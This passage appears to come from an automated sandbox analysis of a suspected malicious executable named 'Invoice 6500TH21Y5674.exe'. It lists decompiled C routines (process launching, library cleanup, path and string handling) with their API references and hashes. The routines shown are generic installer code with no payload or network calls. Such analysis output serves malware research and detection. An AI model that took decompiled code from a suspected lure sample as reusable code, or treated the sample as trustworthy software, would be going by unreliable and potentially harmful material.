                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405773(CHAR* _a4) {
                                                				struct _PROCESS_INFORMATION _v20;
                                                				int _t7;
                                                
                                                				0x7a0d70->cb = 0x44;
                                                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a0d70,  &_v20);
                                                				if(_t7 != 0) {
                                                					CloseHandle(_v20.hThread);
                                                					return _v20.hProcess;
                                                				}
                                                				return _t7;
                                                			}






                                                APIs
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
                                                • CloseHandle.KERNEL32(?), ref: 004057A9
                                                Strings
                                                • Error launching installer, xrefs: 00405786
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403852() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x79e52c;
                                                				_t3 = E00403837(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;
                                                						FreeLibrary( *(_t6 + 8));
                                                						_t3 = GlobalFree(_t6);
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x79e52c =  *0x79e52c & 0x00000000;
                                                				return _t3;
                                                			}








                                                APIs
                                                • FreeLibrary.KERNEL32(?,73BCFA90,00000000,C:\Users\user\AppData\Local\Temp\,0040382A,00403644,?,?,00000007,00000009,0000000B), ref: 0040386C
                                                • GlobalFree.KERNEL32 ref: 00403873
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403852
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405AB3(char* _a4) {
                                                				char* _t3;
                                                				char* _t5;
                                                
                                                				_t5 = _a4;
                                                				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                				while( *_t3 != 0x5c) {
                                                					_t3 = CharPrevA(_t5, _t3);
                                                					if(_t3 > _t5) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				 *_t3 =  *_t3 & 0x00000000;
                                                				return  &(_t3[1]);
                                                			}






                                                APIs
                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405AB9
                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405AC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E72AB10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				char* _t17;
                                                				char _t19;
                                                				void* _t20;
                                                				void* _t24;
                                                				void* _t27;
                                                				void* _t31;
                                                				void* _t37;
                                                				void* _t39;
                                                				void* _t40;
                                                				signed int _t43;
                                                				void* _t52;
                                                				char* _t53;
                                                				char* _t55;
                                                				void* _t56;
                                                				void* _t58;
                                                
                                                				 *0x72ab405c = _a8;
                                                				 *0x72ab4060 = _a16;
                                                				 *0x72ab4064 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x72ab4038, E72AB1556, _t52);
                                                				_t43 =  *0x72ab405c +  *0x72ab405c * 4 << 2;
                                                				_t17 = E72AB123B();
                                                				_a8 = _t17;
                                                				_t53 = _t17;
                                                				if( *_t17 == 0) {
                                                					L16:
                                                					return GlobalFree(_a8);
                                                				} else {
                                                					do {
                                                						_t19 =  *_t53;
                                                						_t55 = _t53 + 1;
                                                						_t58 = _t19 - 0x6c;
                                                						if(_t58 > 0) {
                                                							_t20 = _t19 - 0x70;
                                                							if(_t20 == 0) {
                                                								L12:
                                                								_t53 = _t55 + 1;
                                                								_t24 = E72AB1266(E72AB12AD( *_t55 - 0x30));
                                                								L13:
                                                								GlobalFree(_t24);
                                                								goto L14;
                                                							}
                                                							_t27 = _t20;
                                                							if(_t27 == 0) {
                                                								L10:
                                                								_t53 = _t55 + 1;
                                                								_t24 = E72AB12D1( *_t55 - 0x30, E72AB123B());
                                                								goto L13;
                                                							}
                                                							L7:
                                                							if(_t27 == 1) {
                                                								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                								 *_t31 =  *0x72ab4030;
                                                								 *0x72ab4030 = _t31;
                                                								E72AB1508(_t31 + 4,  *0x72ab4064, _t43);
                                                								_t56 = _t56 + 0xc;
                                                							}
                                                							goto L14;
                                                						}
                                                						if(_t58 == 0) {
                                                							L17:
                                                							_t34 =  *0x72ab4030;
                                                							if( *0x72ab4030 != 0) {
                                                								E72AB1508( *0x72ab4064, _t34 + 4, _t43);
                                                								_t37 =  *0x72ab4030;
                                                								_t56 = _t56 + 0xc;
                                                								GlobalFree(_t37);
                                                								 *0x72ab4030 =  *_t37;
                                                							}
                                                							goto L14;
                                                						}
                                                						_t39 = _t19 - 0x4c;
                                                						if(_t39 == 0) {
                                                							goto L17;
                                                						}
                                                						_t40 = _t39 - 4;
                                                						if(_t40 == 0) {
                                                							 *_t55 =  *_t55 + 0xa;
                                                							goto L12;
                                                						}
                                                						_t27 = _t40;
                                                						if(_t27 == 0) {
                                                							 *_t55 =  *_t55 + 0xa;
                                                							goto L10;
                                                						}
                                                						goto L7;
                                                						L14:
                                                					} while ( *_t53 != 0);
                                                					goto L16;
                                                				}
                                                			}



















                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true
                                                • Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: f3d342cf0a32f8b5f37ee32e90754e8470d22d221b5fa6942aa25712f4d7abe3
                                                • Instruction ID: 27d18b27ee7e673131eb8a466f875cb688b57f9e042b625c227d2d844990c6c8
                                                • Opcode Fuzzy Hash: f3d342cf0a32f8b5f37ee32e90754e8470d22d221b5fa6942aa25712f4d7abe3
                                                • Instruction Fuzzy Hash: 6C31B5B29442449FE7018F6DE998B267FFEFF09344B24592DE846C6168D73DD906CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405BD2(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;
                                                				while(lstrlenA(_t27) >= _v8) {
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                					_t27[_v8] =  *(_t14 + _t27);
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;
                                                					} else {
                                                						_t27 = CharNextA(_t27);
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;
                                                				goto L5;
                                                			}










                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BFA
                                                • CharNextA.USER32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C0B
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                • Instruction ID: c18a7a17a862b3ccaab34bb7c38a9d703f10cc619688c1102a12456a902c3210
                                                • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                • Instruction Fuzzy Hash: 65F0F631208914FFDB12DFA4DD40D9EBBB8EF56354B2540B9E840FB210D674EE019BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%